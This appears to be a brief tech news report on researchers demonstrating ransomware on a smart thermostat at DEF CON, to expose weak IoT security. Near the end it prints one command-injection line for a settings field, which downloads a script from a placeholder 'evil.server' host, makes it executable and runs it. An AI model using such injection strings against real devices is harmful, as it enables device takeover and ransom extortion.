Thermostat ransomware

Ransomware for smart thermostats and other Internet of Things devices was demonstrated at DEF CON in Las Vegas last week by security bods Andrew Tierney and Ken Munro.

The Pen Test Partners pair have written up their work here if you want to see how they managed to infect a thermostat with a software nasty that demands one Bitcoin ($595) to get control back.

To reiterate: the duo wrote the malware themselves and demonstrated it at the hacker convention – this isn't code found in the wild, although clearly there's nothing stopping someone from following the guys' advice.

Tierney explained:

We created fully functioning ransomware to take control of a smart thermostat and lock the user out until they paid up. Turn the heating off in winter? Turn it to max in a summer heatwave?

Our intention was to draw attention to the poor state of security in many domestic IoT devices. Also to raise awareness in the security research community that it’s not all about software hacking. Hardware hacking is often an easier vector.

Simple security controls would have stopped this hack working, yet they weren’t present.

Basically, the unnamed thermostat provides a web interface to control it via the local network. There is no input validation in the device's code so it's possible to inject arbitrary commands into the gadget via the web interface's HTML forms. For example, if you paste this into one of the settings boxes...

; wget http://evil.server/payload.sh ; chmod +x payload.sh ; ./payload.sh;

...bingo, your malware payload.sh is now running on the gadget. This is so typical on many embedded products. The Internet of Things sucks so, so much. ®